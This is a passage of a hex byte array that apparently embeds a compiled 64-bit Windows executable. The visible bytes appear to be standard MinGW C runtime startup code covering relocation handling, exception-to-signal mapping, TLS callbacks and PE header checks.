,0x00 ,0x00 ,0x85 ,0xd2 ,0x0f ,0x84 ,0xa4 ,0x00 ,0x00 ,0x00 ,0x4c ,0x39 ,0xe6 ,0x0f ,0x83 ,0x79 ,0xff ,0xff ,0xff ,0x4c ,0x8d ,0x76 ,0x08 ,0x49 ,0x83 ,0xc4 ,0x07 ,0x4c ,0x8b ,0x2d ,0x08 ,0x28 ,0x00 ,0x00 ,0x48 ,0x8d ,0x7d ,0xa8 ,0x4d ,0x29 ,0xf4 ,0x49 ,0xc1 ,0xec ,0x03 ,0x4e ,0x8d ,0x64 ,0xe6 ,0x08 ,0xeb ,0x0a ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x49 ,0x83 ,0xc6 ,0x08 ,0x8b ,0x4e ,0x04 ,0x41 ,0xb8 ,0x04 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0xfa ,0x8b ,0x06 ,0x4c ,0x89 ,0xf6 ,0x4c ,0x01 ,0xe9 ,0x03 ,0x01 ,0x89 ,0x45 ,0xa8 ,0xe8 ,0x3e ,0xfd ,0xff ,0xff ,0x4d ,0x39 ,0xe6 ,0x75 ,0xd9 ,0x8b ,0x05 ,0x57 ,0x5b ,0x00 ,0x00 ,0x31 ,0xf6 ,0x4c ,0x8b ,0x25 ,0xa2 ,0x77 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x0f ,0x8e ,0x14 ,0xff ,0xff ,0xff ,0x66 ,0x90 ,0x48 ,0x8b ,0x05 ,0x41 ,0x5b ,0x00 ,0x00 ,0x48 ,0x01 ,0xf0 ,0x44 ,0x8b ,0x00 ,0x45 ,0x85 ,0xc0 ,0x74 ,0x0e ,0x48 ,0x8b ,0x50 ,0x10 ,0x49 ,0x89 ,0xf9 ,0x48 ,0x8b ,0x48 ,0x08 ,0x41 ,0xff ,0xd4 ,0x83 ,0xc3 ,0x01 ,0x48 ,0x83 ,0xc6 ,0x28 ,0x3b ,0x1d ,0x17 ,0x5b ,0x00 ,0x00 ,0x7c ,0xd1 ,0xe9 ,0xde ,0xfe ,0xff ,0xff ,0x8b ,0x4e ,0x04 ,0x85 ,0xc9 ,0x0f ,0x85 ,0x51 ,0xff ,0xff ,0xff ,0x8b ,0x56 ,0x08 ,0x85 ,0xd2 ,0x75 ,0x1d ,0x8b ,0x56 ,0x0c ,0x48 ,0x83 ,0xc6 ,0x0c ,0x0f ,0x1f ,0x00 ,0x85 ,0xd2 ,0x0f ,0x85 ,0x38 ,0xff ,0xff ,0xff ,0x8b ,0x46 ,0x04 ,0x85 ,0xc0 ,0x0f ,0x85 ,0x2d ,0xff ,0xff ,0xff ,0x8b ,0x56 ,0x08 ,0x83 ,0xfa ,0x01 ,0x0f ,0x85 ,0x2f ,0x01 ,0x00 ,0x00 ,0x4c ,0x8b ,0x2d ,0x3a ,0x27 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc6 ,0x0c ,0x49 ,0xbf ,0x00 ,0x00 ,0x00 ,0x00 ,0xff ,0xff ,0xff ,0xff ,0x4c ,0x8d ,0x75 ,0xa8 ,0x4c ,0x39 ,0xe6 ,0x72 ,0x48 ,0xe9 ,0x80 ,0xfe ,0xff ,0xff ,0x0f ,0x86 ,0xb8 ,0x00 ,0x00 ,0x00 ,0x83 ,0xfa ,0x20 ,0x0f ,0x84 ,0x7f ,0x00 ,0x00 ,0x00 ,0x83 ,0xfa ,0x40 ,0x0f ,0x85 ,0xe0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x11 ,0x41 ,0xb8 ,0x08 ,0x00 ,0x00 ,0x00 ,0x4c ,0x89 ,0xf7 ,0x48 ,0x29 ,0xc2 ,0x4c ,0x01 ,0xca ,0x48 ,0x89 ,0x55 ,0xa8 ,0x4c ,0x89 ,0xf2 ,0xe8 ,0x58 ,0xfc ,0xff ,0xff ,0x48 ,0x83 ,0xc6 ,0x0c ,0x4c ,0x39 ,0xe6 ,0x0f ,0x83 ,0x12 ,0xff ,0xff ,0xff ,0x8b ,0x4e ,0x04 ,0x8b ,0x06 ,0x0f ,0xb6 ,0x56 ,0x08 ,0x4c ,0x01 ,0xe9 ,0x4c ,0x01 ,0xe8 ,0x83 ,0xfa ,0x10 ,0x4c ,0x8b ,0x08 ,0x75 ,0xa6 ,0x44 ,0x0f ,0xb7 ,0x01 ,0x4c ,0x89 ,0xf2 ,0x4c ,0x89 ,0xf7 ,0x4d ,0x89 ,0xc2 ,0x49 ,0x81 ,0xca ,0x00 ,0x00 ,0xff ,0xff ,0x66 ,0x45 ,0x85 ,0xc0 ,0x4d ,0x0f ,0x48 ,0xc2 ,0x49 ,0x29 ,0xc0 ,0x4d ,0x01 ,0xc8 ,0x4c ,0x89 ,0x45 ,0xa8 ,0x41 ,0xb8 ,0x02 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x03 ,0xfc ,0xff ,0xff ,0xeb ,0xa9 ,0x90 ,0x8b ,0x11 ,0x4c ,0x89 ,0xf7 ,0x49 ,0x89 ,0xd0 ,0x4c ,0x09 ,0xfa ,0x45 ,0x85 ,0xc0 ,0x49 ,0x0f ,0x49 ,0xd0 ,0x41 ,0xb8 ,0x04 ,0x00 ,0x00 ,0x00 ,0x48 ,0x29 ,0xc2 ,0x4c ,0x01 ,0xca ,0x48 ,0x89 ,0x55 ,0xa8 ,0x4c ,0x89 ,0xf2 ,0xe8 ,0xd6 ,0xfb ,0xff ,0xff ,0xe9 ,0x79 ,0xff ,0xff ,0xff ,0x90 ,0x83 ,0xfa ,0x08 ,0x75 ,0x35 ,0x44 ,0x0f ,0xb6 ,0x01 ,0x4c ,0x89 ,0xf2 ,0x4c ,0x89 ,0xf7 ,0x4d ,0x89 ,0xc2 ,0x49 ,0x81 ,0xca ,0x00 ,0xff ,0xff ,0xff ,0x45 ,0x84 ,0xc0 ,0x4d ,0x0f ,0x48 ,0xc2 ,0x49 ,0x29 ,0xc0 ,0x4d ,0x01 ,0xc8 ,0x4c ,0x89 ,0x45 ,0xa8 ,0x41 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x9b ,0xfb ,0xff ,0xff ,0xe9 ,0x3e ,0xff ,0xff ,0xff ,0x48 ,0x8d ,0x0d ,0x87 ,0x25 ,0x00 ,0x00 ,0x48 ,0xc7 ,0x45 ,0xa8 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x12 ,0x0e ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x3b ,0x25 ,0x00 ,0x00 ,0xe8 ,0x06 ,0x0e ,0x00 ,0x00 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x83 ,0xec ,0x28 ,0x8b ,0x01 ,0x3d ,0x91 ,0x00 ,0x00 ,0xc0 ,0x77 ,0x63 ,0x3d ,0x8d ,0x00 ,0x00 ,0xc0 ,0x73 ,0x7b ,0x3d ,0x08 ,0x00 ,0x00 ,0xc0 ,0x0f ,0x84 ,0x05 ,0x01 ,0x00 ,0x00 ,0x0f ,0x87 ,0xcb ,0x00 ,0x00 ,0x00 ,0x3d ,0x02 ,0x00 ,0x00 ,0x80 ,0x0f ,0x84 ,0xf4 ,0x00 ,0x00 ,0x00 ,0x3d ,0x05 ,0x00 ,0x00 ,0xc0 ,0x0f ,0x85 ,0xc3 ,0x00 ,0x00 ,0x00 ,0x31 ,0xd2 ,0xb9 ,0x0b ,0x00 ,0x00 ,0x00 ,0xe8 ,0x01 ,0x0b ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x84 ,0x2f ,0x01 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x0f ,0x84 ,0x3c ,0x01 ,0x00 ,0x00 ,0xb9 ,0x0b ,0x00 ,0x00 ,0x00 ,0xff ,0xd0 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x3d ,0x94 ,0x00 ,0x00 ,0xc0 ,0x0f ,0x84 ,0xb5 ,0x00 ,0x00 ,0x00 ,0x77 ,0x37 ,0x3d ,0x92 ,0x00 ,0x00 ,0xc0 ,0x0f ,0x84 ,0x9c ,0x00 ,0x00 ,0x00 ,0x3d ,0x93 ,0x00 ,0x00 ,0xc0 ,0x75 ,0x6f ,0x31 ,0xd2 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0xad ,0x0a ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x74 ,0x6f ,0x48 ,0x85 ,0xc0 ,0x74 ,0x58 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xff ,0xd0 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x3d ,0x95 ,0x00 ,0x00 ,0xc0 ,0x74 ,0x69 ,0x3d ,0x96 ,0x00 ,0x00 ,0xc0 ,0x75 ,0x3c ,0x31 ,0xd2 ,0xb9 ,0x04 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x7a ,0x0a ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x84 ,0x88 ,0x00 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x0f ,0x84 ,0xb5 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x04 ,0x00 ,0x00 ,0x00 ,0xff ,0xd0 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x90 ,0x3d ,0x1d ,0x00 ,0x00 ,0xc0 ,0x74 ,0xcb ,0x3d ,0x8c ,0x00 ,0x00 ,0xc0 ,0x74 ,0x26 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x29 ,0x0a ,0x00 ,0x00 ,0xe8 ,0xac ,0x09 ,0x00 ,0x00 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x31 ,0xd2 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x0c ,0x0a ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x85 ,0x5b ,0xff ,0xff ,0xff ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0xf3 ,0x09 ,0x00 ,0x00 ,0x31 ,0xc0 ,0xe9 ,0x07 ,0xff ,0xff ,0xff ,0x0f ,0x1f ,0x40 ,0x00 ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x04 ,0x00 ,0x00 ,0x00 ,0xe8 ,0xd9 ,0x09 ,0x00 ,0x00 ,0x31 ,0xc0 ,0xe9 ,0xed ,0xfe ,0xff ,0xff ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x0b ,0x00 ,0x00 ,0x00 ,0xe8 ,0xb9 ,0x09 ,0x00 ,0x00 ,0x31 ,0xc0 ,0xe9 ,0xcd ,0xfe ,0xff ,0xff ,0xb8 ,0x04 ,0x00 ,0x00 ,0x00 ,0xe9 ,0xc3 ,0xfe ,0xff ,0xff ,0x41 ,0x54 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0xe8 ,0x91 ,0x07 ,0x00 ,0x00 ,0x48 ,0x89 ,0xc5 ,0x8b ,0x05 ,0x00 ,0x58 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x75 ,0x25 ,0x48 ,0x85 ,0xed ,0x74 ,0x20 ,0x48 ,0x8d ,0x0d ,0xd8 ,0x23 ,0x00 ,0x00 ,0xc7 ,0x05 ,0xe6 ,0x57 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xe8 ,0xa9 ,0x05 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x14 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0xc3 ,0x0f ,0x1f ,0x40 ,0x00 ,0x48 ,0x8d ,0x1d ,0xd9 ,0x58 ,0x00 ,0x00 ,0xb9 ,0x30 ,0x00 ,0x00 ,0x00 ,0x31 ,0xf6 ,0x48 ,0x8d ,0x15 ,0xcb ,0x57 ,0x00 ,0x00 ,0x48 ,0x89 ,0xdf ,0xf3 ,0x48 ,0xab ,0x4c ,0x8d ,0x25 ,0xee ,0xfd ,0xff ,0xff ,0xb9 ,0x20 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0xd7 ,0xf3 ,0x48 ,0xab ,0x49 ,0x29 ,0xec ,0x48 ,0x89 ,0xd7 ,0xeb ,0x2e ,0xc6 ,0x07 ,0x09 ,0x48 ,0x83 ,0xc6 ,0x01 ,0x48 ,0x83 ,0xc3 ,0x0c ,0x44 ,0x89 ,0x67 ,0x04 ,0x8b ,0x48 ,0x0c ,0x89 ,0x4b ,0xf4 ,0x03 ,0x48 ,0x08 ,0x48 ,0x89 ,0xf8 ,0x48 ,0x83 ,0xc7 ,0x08 ,0x48 ,0x29 ,0xe8 ,0x89 ,0x43 ,0xfc ,0x89 ,0x4b ,0xf8 ,0x48 ,0x83 ,0xfe ,0x20 ,0x74 ,0x32 ,0x48 ,0x89 ,0xf1 ,0xe8 ,0x75 ,0x06 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x75 ,0xc5 ,0x48 ,0x85 ,0xf6 ,0x89 ,0xf2 ,0x0f ,0x84 ,0x71 ,0xff ,0xff ,0xff ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x59 ,0x58 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0xff ,0x15 ,0x20 ,0x73 ,0x00 ,0x00 ,0xe9 ,0x57 ,0xff ,0xff ,0xff ,0xba ,0x20 ,0x00 ,0x00 ,0x00 ,0xeb ,0xe4 ,0x0f ,0x1f ,0x40 ,0x00 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0x48 ,0x8b ,0x11 ,0x8b ,0x02 ,0x48 ,0x89 ,0xcb ,0x89 ,0xc1 ,0x81 ,0xe1 ,0xff ,0xff ,0xff ,0x20 ,0x81 ,0xf9 ,0x43 ,0x43 ,0x47 ,0x20 ,0x0f ,0x84 ,0xbf ,0x00 ,0x00 ,0x00 ,0x3d ,0x91 ,0x00 ,0x00 ,0xc0 ,0x77 ,0x68 ,0x3d ,0x8d ,0x00 ,0x00 ,0xc0 ,0x73 ,0x7c ,0x3d ,0x08 ,0x00 ,0x00 ,0xc0 ,0x0f ,0x84 ,0xb0 ,0x00 ,0x00 ,0x00 ,0x0f ,0x87 ,0xf4 ,0x00 ,0x00 ,0x00 ,0x3d ,0x02 ,0x00 ,0x00 ,0x80 ,0x0f ,0x84 ,0x9f ,0x00 ,0x00 ,0x00 ,0x3d ,0x05 ,0x00 ,0x00 ,0xc0 ,0x75 ,0x1f ,0x31 ,0xd2 ,0xb9 ,0x0b ,0x00 ,0x00 ,0x00 ,0xe8 ,0x5a ,0x08 ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x84 ,0x51 ,0x01 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x0f ,0x85 ,0x0f ,0x01 ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0xa8 ,0x56 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x0f ,0x84 ,0x10 ,0x01 ,0x00 ,0x00 ,0x48 ,0x89 ,0xd9 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0x48 ,0xff ,0xe0 ,0x0f ,0x1f ,0x40 ,0x00 ,0x3d ,0x94 ,0x00 ,0x00 ,0xc0 ,0x0f ,0x84 ,0xb5 ,0x00 ,0x00 ,0x00 ,0x77 ,0x58 ,0x3d ,0x92 ,0x00 ,0x00 ,0xc0 ,0x74 ,0x46 ,0x3d ,0x93 ,0x00 ,0x00 ,0xc0 ,0x75 ,0xc6 ,0x31 ,0xd2 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x01 ,0x08 ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x84 ,0xdf ,0x00 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0xab ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xff ,0xd0 ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0xc3 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf6 ,0x42 ,0x04 ,0x01 ,0x0f ,0x85 ,0x37 ,0xff ,0xff ,0xff ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0xc3 ,0x3d ,0x95 ,0x00 ,0x00 ,0xc0 ,0x74 ,0xee ,0x3d ,0x96 ,0x00 ,0x00 ,0xc0 ,0x0f ,0x85 ,0x6a ,0xff ,0xff ,0xff ,0x31 ,0xd2 ,0xb9 ,0x04 ,0x00 ,0x00 ,0x00 ,0xe8 ,0xa5 ,0x07 ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x84 ,0xb3 ,0x00 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x0f ,0x84 ,0x4b ,0xff ,0xff ,0xff ,0xb9 ,0x04 ,0x00 ,0x00 ,0x00 ,0xff ,0xd0 ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0xeb ,0x9e ,0x3d ,0x1d ,0x00 ,0x00 ,0xc0 ,0x74 ,0xcc ,0x3d ,0x8c ,0x00 ,0x00 ,0xc0 ,0x0f ,0x85 ,0x2b ,0xff ,0xff ,0xff ,0xeb ,0xa2 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x31 ,0xd2 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x5c ,0x07 ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x85 ,0x5b ,0xff ,0xff ,0xff ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x43 ,0x07 ,0x00 ,0x00 ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0xe9 ,0x53 ,0xff ,0xff ,0xff ,0x90 ,0xb9 ,0x0b ,0x00 ,0x00 ,0x00 ,0xff ,0xd0 ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0xe9 ,0x41 ,0xff ,0xff ,0xff ,0x31 ,0xc0 ,0xe9 ,0x3a ,0xff ,0xff ,0xff ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x09 ,0x07 ,0x00 ,0x00 ,0xe8 ,0x8c ,0x06 ,0x00 ,0x00 ,0xe9 ,0x31 ,0xff ,0xff ,0xff ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x0b ,0x00 ,0x00 ,0x00 ,0xe8 ,0xf0 ,0x06 ,0x00 ,0x00 ,0x83 ,0xc8 ,0xff ,0xe9 ,0x02 ,0xff ,0xff ,0xff ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x04 ,0x00 ,0x00 ,0x00 ,0xe8 ,0xd9 ,0x06 ,0x00 ,0x00 ,0x83 ,0xc8 ,0xff ,0xe9 ,0xeb ,0xfe ,0xff ,0xff ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x28 ,0x48 ,0x8d ,0x0d ,0xe1 ,0x57 ,0x00 ,0x00 ,0xff ,0x15 ,0xbb ,0x70 ,0x00 ,0x00 ,0x48 ,0x8b ,0x1d ,0xb4 ,0x57 ,0x00 ,0x00 ,0x48 ,0x85 ,0xdb ,0x74 ,0x33 ,0x48 ,0x8b ,0x2d ,0x30 ,0x71 ,0x00 ,0x00 ,0x48 ,0x8b ,0x3d ,0xc1 ,0x70 ,0x00 ,0x00 ,0x90 ,0x8b ,0x0b ,0xff ,0xd5 ,0x48 ,0x89 ,0xc6 ,0xff ,0xd7 ,0x85 ,0xc0 ,0x75 ,0x0e ,0x48 ,0x85 ,0xf6 ,0x74 ,0x09 ,0x48 ,0x8b ,0x43 ,0x08 ,0x48 ,0x89 ,0xf1 ,0xff ,0xd0 ,0x48 ,0x8b ,0x5b ,0x10 ,0x48 ,0x85 ,0xdb ,0x75 ,0xdc ,0x48 ,0x8d ,0x0d ,0x95 ,0x57 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0x48 ,0xff ,0x25 ,0xa6 ,0x70 ,0x00 ,0x00 ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x28 ,0x8b ,0x05 ,0x5a ,0x57 ,0x00 ,0x00 ,0x31 ,0xf6 ,0x85 ,0xc0 ,0x89 ,0xcd ,0x48 ,0x89 ,0xd7 ,0x75 ,0x0b ,0x89 ,0xf0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0xc3 ,0xba ,0x18 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x01 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x3d ,0x06 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x48 ,0x89 ,0xc3 ,0x74 ,0x3d ,0x89 ,0x28 ,0x48 ,0x8d ,0x0d ,0x3c ,0x57 ,0x00 ,0x00 ,0x48 ,0x89 ,0x78 ,0x08 ,0xff ,0x15 ,0x12 ,0x70 ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0x0b ,0x57 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x24 ,0x57 ,0x00 ,0x00 ,0x48 ,0x89 ,0x1d ,0xfd ,0x56 ,0x00 ,0x00 ,0x48 ,0x89 ,0x43 ,0x10 ,0xff ,0x15 ,0x33 ,0x70 ,0x00 ,0x00 ,0x89 ,0xf0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0xc3 ,0xbe ,0xff ,0xff ,0xff ,0xff ,0xeb ,0x9a ,0x90 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0x8b ,0x05 ,0xdd ,0x56 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x89 ,0xcb ,0x75 ,0x0f ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0xc3 ,0x0f ,0x1f ,0x80 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0xd9 ,0x56 ,0x00 ,0x00 ,0xff ,0x15 ,0xb3 ,0x6f ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0xac ,0x56 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x1a ,0x8b ,0x10 ,0x39 ,0xd3 ,0x75 ,0x0b ,0xeb ,0x4f ,0x8b ,0x11 ,0x39 ,0xda ,0x74 ,0x29 ,0x48 ,0x89 ,0xc8 ,0x48 ,0x8b ,0x48 ,0x10 ,0x48 ,0x85 ,0xc9 ,0x75 ,0xee ,0x48 ,0x8d ,0x0d ,0xa6 ,0x56 ,0x00 ,0x00 ,0xff ,0x15 ,0xc0 ,0x6f ,0x00 ,0x00 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0xc3 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x51 ,0x10 ,0x48 ,0x89 ,0x50 ,0x10 ,0xe8 ,0x6b ,0x05 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x7c ,0x56 ,0x00 ,0x00 ,0xff ,0x15 ,0x96 ,0x6f ,0x00 ,0x00 ,0xeb ,0xd4 ,0x0f ,0x1f ,0x40 ,0x00 ,0x48 ,0x8b ,0x50 ,0x10 ,0x48 ,0x89 ,0xc1 ,0x48 ,0x89 ,0x15 ,0x42 ,0x56 ,0x00 ,0x00 ,0xeb ,0xd8 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0x83 ,0xfa ,0x01 ,0x0f ,0x84 ,0x92 ,0x00 ,0x00 ,0x00 ,0x72 ,0x30 ,0x83 ,0xfa ,0x02 ,0x74 ,0x1b ,0x83 ,0xfa ,0x03 ,0x75 ,0x1b ,0x8b ,0x05 ,0x28 ,0x56 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x74 ,0x11 ,0xe8 ,0x47 ,0xfe ,0xff ,0xff ,0xeb ,0x0a ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0xe8 ,0x8b ,0x04 ,0x00 ,0x00 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0xc3 ,0x8b ,0x05 ,0x02 ,0x56 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x0f ,0x85 ,0x82 ,0x00 ,0x00 ,0x00 ,0x8b ,0x05 ,0xf4 ,0x55 ,0x00 ,0x00 ,0x83 ,0xf8 ,0x01 ,0x75 ,0xdc ,0x48 ,0x8b ,0x0d ,0xe0 ,0x55 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc9 ,0x74 ,0x11 ,0x48 ,0x8b ,0x59 ,0x10 ,0xe8 ,0xda ,0x04 ,0x00 ,0x00 ,0x48 ,0x85 ,0xdb ,0x48 ,0x89 ,0xd9 ,0x75 ,0xef ,0x48 ,0x8d ,0x0d ,0xe3 ,0x55 ,0x00 ,0x00 ,0x48 ,0xc7 ,0x05 ,0xb8 ,0x55 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc7 ,0x05 ,0xb6 ,0x55 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xff ,0x15 ,0xa0 ,0x6e ,0x00 ,0x00 ,0xeb ,0x9b ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x8b ,0x05 ,0xa2 ,0x55 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x74 ,0x16 ,0xc7 ,0x05 ,0x94 ,0x55 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0xc3 ,0x90 ,0x48 ,0x8d ,0x0d ,0x99 ,0x55 ,0x00 ,0x00 ,0xff ,0x15 ,0xab ,0x6e ,0x00 ,0x00 ,0xeb ,0xdb ,0x90 ,0xe8 ,0x9b ,0xfd ,0xff ,0xff ,0xe9 ,0x74 ,0xff ,0xff ,0xff ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x63 ,0x41 ,0x3c ,0x48 ,0x01 ,0xc1 ,0x31 ,0xc0 ,0x81 ,0x39 ,0x50 ,0x45 ,0x00 ,0x00 ,0x74 ,0x01 ,0xc3 ,0x31 ,0xc0 ,0x66 ,0x81 ,0x79 ,0x18 ,0x0b ,0x02 ,0x0f ,0x94 ,0xc0 ,0xc3 ,0x66 ,0x90 ,0x66 ,0x81 ,0x39 ,0x4d ,0x5a ,0x74 ,0x09 ,0x31 ,0xc0 ,0xc3 ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0xeb ,0xce ,0x0f ,0x1f ,0x40 ,0x00 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x63 ,0x41 ,0x3c ,0x48 ,0x01 ,0xc1 ,0x0f ,0xb7 ,0x41 ,0x14 ,0x48 ,0x8d ,0x44 ,0x01 ,0x18 ,0x0f ,0xb7 ,0x49 ,0x06 ,0x85 ,0xc9 ,0x74 ,0x29 ,0x83 ,0xe9 ,0x01 ,0x48 ,0x8d ,0x0c ,0x89 ,0x4c ,0x8d ,0x4c ,0xc8 ,0x28 ,0x44 ,0x8b ,0x40 ,0x0c ,0x49 ,0x39 ,0xd0 ,0x4c ,0x89 ,0xc1 ,0x77 ,0x08 ,0x03 ,0x48 ,0x08 ,0x48 ,0x39 ,0xd1 ,0x77 ,0x0b ,0x48 ,0x83 ,0xc0 ,0x28 ,0x4c ,0x39 ,0xc8 ,0x75 ,0xe3 ,0x31 ,0xc0 ,0xc3 ,0x66 ,0x90 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 